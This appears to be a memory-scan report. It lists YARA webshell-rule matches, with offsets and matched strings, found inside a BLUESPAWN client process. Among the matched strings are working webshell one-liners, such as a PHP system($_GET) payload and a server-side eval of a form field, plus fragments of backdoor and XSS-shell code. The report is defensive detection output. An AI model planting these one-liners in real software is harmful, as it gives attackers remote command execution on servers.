|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | commands | Webshells Auto-generated - file commands.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31b42b:$s1: If CheckRecord("SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = " & VictimID
- 0x36c1a1:$s1: If CheckRecord("SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = " & VictimID
- 0x31b488:$s2: proxyArr = Array ("HTTP_X_FORWARDED_FOR","HTTP_VIA","HTTP_CACHE_CONTROL","HTTP_F
- 0x36c1f4:$s2: proxyArr = Array ("HTTP_X_FORWARDED_FOR","HTTP_VIA","HTTP_CACHE_CONTROL","HTTP_F
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | hkdoordll | Webshells Auto-generated - file hkdoordll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31b5f6:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
- 0x36c2f4:$s6: Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | r57shell_2 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31b764:$s2: echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
- 0x36c3f4:$s2: echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_v1_45_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31b8dc:$s3: syspath
- 0x36c4fe:$s3: syspath
- 0x316d35:$s4: \Mithril
- 0x31b8f0:$s4: \Mithril
- 0x31be98:$s4: \Mithril
- 0x3690ce:$s4: \Mithril
- 0x36c508:$s4: \Mithril
- 0x36c8da:$s4: \Mithril
- 0x31b905:$s5: --list the services in the computer
- 0x31d8ec:$s5: --list the services in the computer
- 0x36c513:$s5: --list the services in the computer
- 0x36dab4:$s5: --list the services in the computer
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | dbgiis6cli | Webshells Auto-generated - file dbgiis6cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ba48:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- 0x36c5e8:$s0: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
- 0x31ba94:$s5: ###command:(NO more than 100 bytes!)
- 0x36c62a:$s5: ###command:(NO more than 100 bytes!)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | remview_2003_04_22 | Webshells Auto-generated - file remview_2003_04_22.php | Yara Bulk Rule Generator by Florian Roth | - 0x31bbe8:$s1: "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\"
- 0x36c710:$s1: "<b>".mm("Eval PHP code")."</b> (".mm("don't type")." \"<?\"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_test | Webshells Auto-generated - file test.php | Yara Bulk Rule Generator by Florian Roth | - 0x2fb321:$s0: $yazi = "test" . "\r\n";
- 0x31bd41:$s0: $yazi = "test" . "\r\n";
- 0x354e01:$s0: $yazi = "test" . "\r\n";
- 0x36c7fb:$s0: $yazi = "test" . "\r\n";
- 0x2fb346:$s2: fwrite ($fp, "$yazi");
- 0x31bd66:$s2: fwrite ($fp, "$yazi");
- 0x354e1c:$s2: fwrite ($fp, "$yazi");
- 0x36c816:$s2: fwrite ($fp, "$yazi");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Debug_cress | Webshells Auto-generated - file cress.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31be98:$s0: \Mithril
- 0x36c8da:$s0: \Mithril
- 0x316c58:$s4: Mithril.exe
- 0x31abdc:$s4: Mithril.exe
- 0x31beae:$s4: Mithril.exe
- 0x369042:$s4: Mithril.exe
- 0x36bc05:$s4: Mithril.exe
- 0x36c8e6:$s4: Mithril.exe
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_EFSO_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c14a:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31f1a8:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36ca7e:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36eb8c:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31c1a7:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x31f205:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36cad1:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36ebdf:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | thelast_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x31c317:$s5: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"Your Name\" field is r
- 0x36cbd3:$s5: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"Your Name\" field is r
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | adjustcr | Webshells Auto-generated - file adjustcr.exe | Yara Bulk Rule Generator by Florian Roth | - 0x316628:$s0: $Info: This file is packed with the UPX executable packer $
- 0x31c483:$s0: $Info: This file is packed with the UPX executable packer $
- 0x368bc9:$s0: $Info: This file is packed with the UPX executable packer $
- 0x36ccd1:$s0: $Info: This file is packed with the UPX executable packer $
- 0x31c4cb:$s2: $License: NRV for UPX is distributed under special license $
- 0x36cd0f:$s2: $License: NRV for UPX is distributed under special license $
- 0x31c514:$s6: AdjustCR Carr
- 0x36cd4e:$s6: AdjustCR Carr
- 0x31668d:$s7: ION\System\FloatingPo
- 0x31c52e:$s7: ION\System\FloatingPo
- 0x368c1a:$s7: ION\System\FloatingPo
- 0x36cd5e:$s7: ION\System\FloatingPo
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_xIShell | Webshells Auto-generated - file xIShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31c676:$s3: if (!$nix) { $xid = implode(explode("\\",$xid),"\\\\");}echo ("<td><a href='Java
- 0x36ce38:$s3: if (!$nix) { $xid = implode(explode("\\",$xid),"\\\\");}echo ("<td><a href='Java
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_AppPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c7e8:$s6: " onclick="this.form.sqlStr.value='e:\hytop.mdb
- 0x36cf3c:$s6: " onclick="this.form.sqlStr.value='e:\hytop.mdb
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell | Webshells Auto-generated - file xssshell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c933:$s1: if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), "pushComma
- 0x36d019:$s1: if( !getRequest(COMMANDS_URL + "?v=" + VICTIM + "&r=" + generateID(), "pushComma
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FeliksPack3___PHP_Shells_usr | Webshells Auto-generated - file usr.php | Yara Bulk Rule Generator by Florian Roth | - 0x31caae:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
- 0x36d126:$s0: <?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phpinj | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x3071fd:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x31cc1c:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x35d98d:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
- 0x36d226:$s4: echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell_db | Webshells Auto-generated - file db.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31cd73:$s8: '// By Ferruh Mavituna | http://ferruh.mavituna.com
- 0x36d30f:$s8: '// By Ferruh Mavituna | http://ferruh.mavituna.com
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_sh | Webshells Auto-generated - file sh.php | Yara Bulk Rule Generator by Florian Roth | - 0x31ceba:$s1: "@$SERVER_NAME ".exec("pwd")
- 0x36d3e8:$s1: "@$SERVER_NAME ".exec("pwd")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell_default | Webshells Auto-generated - file default.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31cff9:$s3: If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
- 0x36d4b9:$s3: If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EditServer_Webshell_2 | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31d16b:$s0: @HOTMAIL.COM
- 0x36d5bd:$s0: @HOTMAIL.COM
- 0x31d184:$s1: Press Any Ke
- 0x36d5cc:$s1: Press Any Ke
- 0x31d19d:$s3: glish MenuZ
- 0x36d5db:$s3: glish MenuZ
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | by064cli | Webshells Auto-generated - file by064cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31d2c4:$s7: packet dropped,redirecting
- 0x36d694:$s7: packet dropped,redirecting
- 0x31d2eb:$s9: input the password(the default one is 'by')
- 0x36d6b1:$s9: input the password(the default one is 'by')
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mithril_dllTest | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31d438:$s0: please enter the password:
- 0x36d790:$s0: please enter the password:
- 0x31d45f:$s3: \dllTest.pdb
- 0x31d8d3:$s3: \dllTest.pdb
- 0x36d7ad:$s3: \dllTest.pdb
- 0x36daa5:$s3: \dllTest.pdb
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | peek_a_boo | Webshells Auto-generated - file peek-a-boo.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31d58b:$s0: __vbaHresultCheckObj
- 0x36d86b:$s0: __vbaHresultCheckObj
- 0x31d5ac:$s1: \VB\VB5.OLB
- 0x36d882:$s1: \VB\VB5.OLB
- 0x31d5c4:$s2: capGetDriverDescriptionA
- 0x36d890:$s2: capGetDriverDescriptionA
- 0x317e70:$s3: __vbaExceptHandler
- 0x31d5e9:$s3: __vbaExceptHandler
- 0x369cd9:$s3: __vbaExceptHandler
- 0x36d8ab:$s3: __vbaExceptHandler
- 0x317e8f:$s4: EVENT_SINK_Release
- 0x31d608:$s4: EVENT_SINK_Release
- 0x369cee:$s4: EVENT_SINK_Release
- 0x36d8c0:$s4: EVENT_SINK_Release
- 0x31d627:$s8: __vbaErrorOverflow
- 0x36d8d5:$s8: __vbaErrorOverflow
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | fmlibraryv3 | Webshells Auto-generated - file fmlibraryv3.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31d75b:$s3: ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER
- 0x36d99b:$s3: ExeNewRs.CommandText = "UPDATE " & tablename & " SET " & ExeNewRsValues & " WHER
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Debug_dllTest_2 | Webshells Auto-generated - file dllTest.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31d8cd:$s4: \Debug\dllTest.pdb
- 0x36da9f:$s4: \Debug\dllTest.pdb
- 0x31b905:$s5: --list the services in the computer
- 0x31d8ec:$s5: --list the services in the computer
- 0x36c513:$s5: --list the services in the computer
- 0x36dab4:$s5: --list the services in the computer
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | connector | Webshells Auto-generated - file connector.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31da2d:$s2: If ( AttackID = BROADCAST_ATTACK )
- 0x36db87:$s2: If ( AttackID = BROADCAST_ATTACK )
- 0x31da5c:$s4: Add UNIQUE ID for victims / zombies
- 0x36dbac:$s4: Add UNIQUE ID for victims / zombies
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_HideRun | Webshells Auto-generated - file HideRun.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31dbad:$s0: Usage -- hiderun [AppName]
- 0x36dc8f:$s0: Usage -- hiderun [AppName]
- 0x31dbd4:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
- 0x36dcac:$s7: PVAX SW, Alexey A. Popoff, Moscow, 1997.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHP_Shell_v1_7 | Webshells Auto-generated - file PHP_Shell_v1.7.php | Yara Bulk Rule Generator by Florian Roth | - 0x2f7d76:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x31dd24:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x35252e:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
- 0x36dd8e:$s8: <title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | xssshell_save | Webshells Auto-generated - file save.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31de71:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
- 0x36de6d:$s4: RawCommand = Command & COMMAND_SEPERATOR & Param & COMMAND_SEPERATOR & AttackID
- 0x31decd:$s5: VictimID = fm_NStr(Victims(i))
- 0x36debf:$s5: VictimID = fm_NStr(Victims(i))
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_phpinj_2 | Webshells Auto-generated - file phpinj.php | Yara Bulk Rule Generator by Florian Roth | - 0x31e166:$s9: <? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO
- 0x36e068:$s9: <? system(\$_GET[cpc]);exit; ?>' ,0 ,0 ,0 ,0 INTO
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ZXshell2_0_rar_Folder_zxrecv | Webshells Auto-generated - file zxrecv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31e2c5:$s0: RyFlushBuff
- 0x36e159:$s0: RyFlushBuff
- 0x31e2dd:$s1: teToWideChar^FiYP
- 0x36e167:$s1: teToWideChar^FiYP
- 0x31e2fb:$s2: mdesc+8F D
- 0x36e17b:$s2: mdesc+8F D
- 0x31e312:$s3: \von76std
- 0x36e188:$s3: \von76std
- 0x31e328:$s4: 5pur+virtul
- 0x36e194:$s4: 5pur+virtul
- 0x31e340:$s5: - Kablto io
- 0x36e1a2:$s5: - Kablto io
- 0x31e358:$s6: ac#f{lowi8a
- 0x36e1b0:$s6: ac#f{lowi8a
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_ajan | Webshells Auto-generated - file ajan.asp | Yara Bulk Rule Generator by Florian Roth | - 0x2e36fc:$s4: entrika.write "BinaryStream.SaveToFile
- 0x31e47d:$s4: entrika.write "BinaryStream.SaveToFile
- 0x344459:$s4: entrika.write "BinaryStream.SaveToFile
- 0x36e267:$s4: entrika.write "BinaryStream.SaveToFile
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | c99shell | Webshells Auto-generated - file c99shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x31e5bf:$s0: <br />Input URL: <input name=\"uploadurl\" type=\"text\"&
- 0x36e33b:$s0: <br />Input URL: <input name=\"uploadurl\" type=\"text\"&
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpspy_2005_full | Webshells Auto-generated - file phpspy_2005_full.php | Yara Bulk Rule Generator by Florian Roth | - 0x31e73b:$s7: echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlenco
- 0x36e449:$s7: echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlenco
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_zehir4_2 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31e8ab:$s4: "Program Files\Serv-u\Serv
- 0x36e54b:$s4: "Program Files\Serv-u\Serv
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_indexer_2 | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31e9e7:$s5: <td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
- 0x36e619:$s5: <td>Nerden :<td><input type="text" name="nerden" size=25 value=index.html></td>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop_DevPack_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31eb58:$s7: theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")
- 0x36e71c:$s7: theHref=encodeForUrl(mid(replace(lcase(list.path),lcase(server.mapPath("/")),"")
- 0x31ebb5:$s8: scrollbar-darkshadow-color:#9C9CD3;
- 0x36e76f:$s8: scrollbar-darkshadow-color:#9C9CD3;
- 0x31ebe5:$s9: scrollbar-face-color:#E4E4F3;
- 0x36e795:$s9: scrollbar-face-color:#E4E4F3;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | _root_040_zip_Folder_deploy | Webshells Auto-generated - file deploy.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ed2f:$s5: halon synscan 127.0.0.1 1-65536
- 0x36e871:$s5: halon synscan 127.0.0.1 1-65536
- 0x31ed5b:$s8: Obviously you replace the ip address with that of the target.
- 0x36e893:$s8: Obviously you replace the ip address with that of the target.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | by063cli | Webshells Auto-generated - file by063cli.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31eeb4:$s2: #popmsghello,are you all right?
- 0x36e97e:$s2: #popmsghello,are you all right?
- 0x31eee0:$s4: connect failed,check your network and remote ip.
- 0x36e9a0:$s4: connect failed,check your network and remote ip.
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | icyfox007v1_10_rar_Folder_asp | Webshells Auto-generated - file asp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31f03c:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
- 0x36ea8e:$s0: <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | FSO_s_EFSO_2_2 | Webshells Auto-generated - file EFSO_2.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31c14a:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31f1a8:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36ca7e:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x36eb8c:$s0: ;!+/DRknD7+.\mDrC(V+kcJznndm\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl"dKVcJ\CslU,),@!0KxD~mKV
- 0x31c1a7:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x31f205:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36cad1:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
- 0x36ebdf:$s4: \co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX"b~/fAs!u&9|J\grKp"j
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | byshell063_ntboot_2 | Webshells Auto-generated - file ntboot.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31f37a:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
- 0x36ece6:$s6: OK,job was done,cuz we have localsystem & SE_DEBUG_NAME:)
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | u_uay | Webshells Auto-generated - file uay.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31f4c7:$s1: exec "c:\WINDOWS\System32\freecell.exe
- 0x36edc5:$s1: exec "c:\WINDOWS\System32\freecell.exe
- 0x31f4fa:$s9: SYSTEM\CurrentControlSet\Services\uay.sys\Security
- 0x36edee:$s9: SYSTEM\CurrentControlSet\Services\uay.sys\Security
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | bin_wuaus | Webshells Auto-generated - file wuaus.dll | Yara Bulk Rule Generator by Florian Roth | - 0x31f646:$s1: 9(90989@9V9^9f9n9v9
- 0x36eecc:$s1: 9(90989@9V9^9f9n9v9
- 0x31f666:$s2: :(:,:0:4:8:C:H:N:T:Y:_:e:o:y:
- 0x36eee2:$s2: :(:,:0:4:8:C:H:N:T:Y:_:e:o:y:
- 0x31f690:$s3: ;(=@=G=O=T=X=\=
- 0x36ef02:$s3: ;(=@=G=O=T=X=\=
- 0x31f6ac:$s4: TCP Send Error!!
- 0x36ef14:$s4: TCP Send Error!!
- 0x31f6c9:$s5: 1"1;1X1^1e1m1w1~1
- 0x36ef27:$s5: 1"1;1X1^1e1m1w1~1
- 0x31f6e7:$s8: =$=)=/=<=Y=_=j=p=z=
- 0x36ef3b:$s8: =$=)=/=<=Y=_=j=p=z=
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | pwreveal | Webshells Auto-generated - file pwreveal.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31f816:$s0: *<Blank - no es
- 0x36effc:$s0: *<Blank - no es
- 0x31f832:$s3: JDiamondCS
- 0x36f00e:$s3: JDiamondCS
- 0x31f84a:$s8: sword set> [Leith=0 bytes]
- 0x36f01c:$s8: sword set> [Leith=0 bytes]
- 0x31f871:$s9: ION\System\Floating-
- 0x36f039:$s9: ION\System\Floating-
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | shelltools_g0t_root_xwhois | Webshells Auto-generated - file xwhois.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31f9b1:$s1: rting!
- 0x36f10b:$s1: rting!
- 0x31f9c5:$s2: aTypCog(
- 0x36f115:$s2: aTypCog(
- 0x3143e2:$s5: Diamond
- 0x3165f9:$s5: Diamond
- 0x318eae:$s5: Diamond
- 0x31f833:$s5: Diamond
- 0x31f9da:$s5: Diamond
- 0x3673fb:$s5: Diamond
- 0x368bae:$s5: Diamond
- 0x36a7b3:$s5: Diamond
- 0x36f00f:$s5: Diamond
- 0x36f120:$s5: Diamond
- 0x31f9ee:$s6: r)r=rQreryr
- 0x36f12a:$s6: r)r=rQreryr
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | vanquish_2 | Webshells Auto-generated - file vanquish.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31fb17:$s2: Vanquish - DLL injection failed:
- 0x36f1e5:$s2: Vanquish - DLL injection failed:
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | down_rar_Folder_down | Webshells Auto-generated - file down.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31fc5b:$s0: response.write "<font color=blue size=2>NetBios Name: \\" & Snet.ComputerName &
- 0x36f2bb:$s0: response.write "<font color=blue size=2>NetBios Name: \\" & Snet.ComputerName &
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cmdShell | Webshells Auto-generated - file cmdShell.asp | Yara Bulk Rule Generator by Florian Roth | - 0x31fdc7:$s1: if cmdPath="wscriptShell" then
- 0x36f3b9:$s1: if cmdPath="wscriptShell" then
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ZXshell2_0_rar_Folder_nc | Webshells Auto-generated - file nc.exe | Yara Bulk Rule Generator by Florian Roth | - 0x31ff0b:$s0: WSOCK32.dll
- 0x36f48f:$s0: WSOCK32.dll
- 0x31ff23:$s1: ?bSUNKNOWNV
- 0x36f49d:$s1: ?bSUNKNOWNV
- 0x31ff3b:$s7: p@gram Jm6h)
- 0x36f4ab:$s7: p@gram Jm6h)
- 0x31ff54:$s8: ser32.dllCONFP@
- 0x36f4ba:$s8: ser32.dllCONFP@
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | portlessinst | Webshells Auto-generated - file portlessinst.exe | Yara Bulk Rule Generator by Florian Roth | - 0x320087:$s2: Fail To Open Registry
- 0x36f57f:$s2: Fail To Open Registry
- 0x3200a9:$s3: f<-WLEggDr"
- 0x36f597:$s3: f<-WLEggDr"
- 0x3200c1:$s6: oMemoryCreateP
- 0x36f5a5:$s6: oMemoryCreateP
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SetupBDoor | Webshells Auto-generated - file SetupBDoor.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3201ef:$s1: \BDoor\SetupBDoor
- 0x36f665:$s1: \BDoor\SetupBDoor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | phpshell_3 | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x2d4f3d:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x2f7d26:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x32031e:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x33a6e6:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x3524e8:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x36f726:$s3: <input name="submit_btn" type="submit" value="Execute Command"></p>
- 0x32036e:$s5: echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
- 0x36f76c:$s5: echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | BIN_Server | Webshells Auto-generated - file Server.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3204d9:$s0: configserver
- 0x36f869:$s0: configserver
- 0x8bd85:$s1: GetLogicalDrives
- 0x8bda2:$s1: GetLogicalDrives
- 0x10e038:$s1: GetLogicalDrives
- 0x10e055:$s1: GetLogicalDrives
- 0x3204f2:$s1: GetLogicalDrives
- 0x36f878:$s1: GetLogicalDrives
- 0x112029:$s2: WinExec
- 0x113211:$s2: WinExec
- 0x32050f:$s2: WinExec
- 0x36f88b:$s2: WinExec
- 0x320523:$s4: fxftest
- 0x36f895:$s4: fxftest
- 0x320537:$s5: upfileok
- 0x36f89f:$s5: upfileok
- 0x32054c:$s7: upfileer
- 0x36f8aa:$s7: upfileer
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HYTop2006_rar_Folder_2006 | Webshells Auto-generated - file 2006.asp | Yara Bulk Rule Generator by Florian Roth | - 0x32067d:$s6: strBackDoor = strBackDoor
- 0x36f96d:$s6: strBackDoor = strBackDoor
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | r57shell_3 | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x3207b5:$s1: <b>".$_POST['cmd']
- 0x36fa37:$s1: <b>".$_POST['cmd']
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HDConfig | Webshells Auto-generated - file HDConfig.exe | Yara Bulk Rule Generator by Florian Roth | - 0x3208e3:$s0: An encryption key is derived from the password hash.
- 0x36faf7:$s0: An encryption key is derived from the password hash.
- 0x320925:$s3: A hash object has been created.
- 0x36fb2f:$s3: A hash object has been created.
- 0x320952:$s4: Error during CryptCreateHash!
- 0x36fb52:$s4: Error during CryptCreateHash!
- 0x32097c:$s5: A new key container has been created.
- 0x36fb72:$s5: A new key container has been created.
- 0x3209ae:$s6: The password has been added to the hash.
- 0x36fb9a:$s6: The password has been added to the hash.
|
